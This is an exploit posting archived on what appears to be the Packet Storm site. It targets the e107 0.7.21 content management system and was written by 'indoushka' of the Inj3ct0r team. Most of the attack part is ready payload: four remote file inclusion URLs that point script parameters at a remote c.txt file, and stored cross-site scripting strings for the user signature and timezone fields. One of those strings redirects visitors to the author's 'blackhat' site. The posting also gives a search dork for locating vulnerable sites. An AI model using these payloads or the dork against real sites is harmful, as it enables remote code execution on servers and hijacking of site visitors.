what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

e107 0.7.21 Cross Site Scripting / Remote File Inclusion

e107 0.7.21 Cross Site Scripting / Remote File Inclusion
Posted Jun 2, 2010
Authored by indoushka

e107 version 0.7.21 suffers from cross site scripting and remote file inclusion vulnerabilities.

tags | exploit, remote, vulnerability, code execution, xss, file inclusion
SHA-256 | f8b4d66de843d9ce7e1495e2fabc0e17eac81cea36043e2fa7a3f18a41ed1256

e107 0.7.21 Cross Site Scripting / Remote File Inclusion

Change Mirror Download
======================================================================= 

# e107 0.7.21 full Mullti (RFI/XSS) Vulnerabilities

=======================================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0

0 _ __ __ __ 1

1 /' \ __ /'__`\ /\ \__ /'__`\ 0

0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1

1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0

0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1

1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0

0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1

1 \ \____/ >> Exploit database separated by exploit 0

0 \/___/ type (local, remote, DoS, etc.) 1

1 1

0 [+] Site : Inj3ct0r.com 0

1 [+] Support e-mail : submit[at]inj3ct0r.com 1

0 0

1 #################################### 1

0 I'm indoushka member from Inj3ct0r Team 1

1 #################################### 0

0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1



########################################################################

# Name: e107 0.7.21 full (RFI) Vulnerabilities

# Vendor: http://e107.org/

# Date: 2010-05-27

# Author : indoushka

# Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com !

# Contact : indoushka@hotmail.com

# Home : www.arab-blackhat.co.cc

# Bug : RFI

# Tested on : windows SP2 Fran├žais V.(Pnx2 2.0)
########################################################################

# Dork : This site is powered by e107, which is released under the terms of the GNU GPL License.

# Exploit By indoushka

I - RFI:

1 - http://localhost/e107/fpw.php?THEMES_DIRECTORY=http://localhost/c.txt?

2 - http://localhost/e107/e107_handlers/secure_img_render.php?ifile=http://localhost/c.txt?

3 - http://localhost/e107/e107_plugins/content/handlers/content_class.php?plugindir=http://localhost/c.txt?

4 - http://localhost/e107/e107_plugins/content/handlers/content_convert_class.php?plugindir=http://localhost/c.txt?

II - XSS :

After Rigester Go to user Seting

1 - http://127.0.0.1/e107/usersettings.php

and Edit Signature / Timezone Put this code Or other's

( ">"">>>><script>location="http://www.arab-blackhat.co.cc"</script>""""> )

( <ScRiPt>alert(213771818860)</ScRiPt> )


Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ====================
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R * www.alkrsan.net * MR.SoOoFe * ThE g0bL!N
------------------------------------------------------------------------------------------------------------------------
Login or Register to add favorites

File Archive:

September 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    2 Files
  • 2
    Sep 2nd
    21 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    17 Files
  • 5
    Sep 5th
    34 Files
  • 6
    Sep 6th
    29 Files
  • 7
    Sep 7th
    11 Files
  • 8
    Sep 8th
    25 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    26 Files
  • 12
    Sep 12th
    23 Files
  • 13
    Sep 13th
    17 Files
  • 14
    Sep 14th
    22 Files
  • 15
    Sep 15th
    16 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    19 Files
  • 19
    Sep 19th
    60 Files
  • 20
    Sep 20th
    23 Files
  • 21
    Sep 21st
    15 Files
  • 22
    Sep 22nd
    8 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    17 Files
  • 26
    Sep 26th
    3 Files
  • 27
    Sep 27th
    13 Files
  • 28
    Sep 28th
    5 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close